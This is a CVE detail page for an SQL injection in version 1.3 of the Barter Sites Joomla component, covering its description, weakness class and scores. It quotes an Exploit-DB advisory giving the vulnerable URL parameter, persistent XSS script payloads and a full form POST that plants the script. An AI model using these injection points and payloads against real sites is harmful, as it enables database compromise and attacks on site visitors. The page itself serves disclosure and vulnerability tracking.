CVE-2011-4829 : Detail

CVE-2011-4829

SQL Injection
A03-Injection
0.1%V3
Network
2011-12-15
02h00 +00:00
2024-09-17
01h10 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

SQL injection vulnerability in the com_listing component in Barter Sites component 1.3 for Joomla! allows remote attackers to execute arbitrary SQL commands via the category_id parameter to index.php.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 18046

Publication date : 2011-10-28 22h00 +00:00
Author : Chris Russell
EDB Verified : Yes

#################################################################################### Barter Sites 1.3 Component Joomla SQL Injection & Persistent XSS vulnerabilities #################################################################################### Release Date Bug. 28-Oct-2011 Date Added. 01-Oct-2011 Vendor Notification Date. Never Product. Barter Sites Platform. Joomla Affected versions. 1.3 Type. Commercial Price. $99 Attack Vector. Sql Injection & Persistent XSS Solution Status. unpublished CVE reference. Not yet assigned Download. www.barter-sites.com/content/getStarted I. BACKGROUND The Barter Sites extension is for operating a trade group. Members post listings in the barter directory on your site, send each other offers and messages, negotiate, and 'pay' with either direct trade or with your own private digital currency called trade credits. You can even issue lines of credit. Admin has the option to earn commissions on trade credit transfers and can run transactions for the members, serving as a barter broker. Features Include: * HTML Listings * Barter Wish-list * Direct Trade Offers * Virtual Private Currency * Trade Credit Transfers * Admin Broker/Transfer * Generate Invoices * Paypal Commissions * Member Reputations * Private Messaging * and more! II. DESCRIPTION Two vulnerabilities discovered - Category_id Parameter SQL injection - XSS in several places III. EXPLOITATION *INJECTION SQL parameter [category_id]: /index.php?option=com_listing&task=browse&category_id=1[SQL] [SQL]=Injection Sql *Persistent XSS main Register->> Login ---> barter>Post: or /index.php?option=com_listing&task=post&Itemid=2 Listing Title: <IMG """><SCRIPT>alert("XSS")</SCRIPT> selection category. XSS look at: barter>selection category ---->To view the xss is not necessary to be registered *Persistent XSS side In the form of the Post, you can insert xss in all settings: -Website Address -Payment types accepted -Sell Price -Shipping Cost -Quantity all can be inserted into the header, but for Facilides directly on the form all: <IMG """><SCRIPT>alert("XSS")</SCRIPT> *Persistent XSS in pictures If you prefer pictures to insert in the xss edit header values as follows: Get:/index.php?option=com_listing&task=listingsave Post: -----------------------------106542362324353\r\n Content-Disposition: form-data; name="listing_title"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="description"\r\n \r\n <p><IMG """><SCRIPT>alert("XSS")</SCRIPT></p>\r\n <-----------------------------------click here -----------------------------106542362324353\r\n Content-Disposition: form-data; name="homeurl"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="category_id"\r\n \r\n 34\r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="paystring"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="sell_price"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="shipping_cost"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="quantity"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="submit"\r\n \r\n Submit\r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="listing_id"\r\n \r\n \r\n -----------------------------106542362324353--\r\n Discovered by. Chris Russell

Products Mentioned

Configuraton 0

Barter-sites>>Com_listing >> Version 1.3

    Joomla>>Joomla\! >> Version *

    References

    http://www.exploit-db.com/exploits/18046
    Tags : exploit, x_refsource_EXPLOIT-DB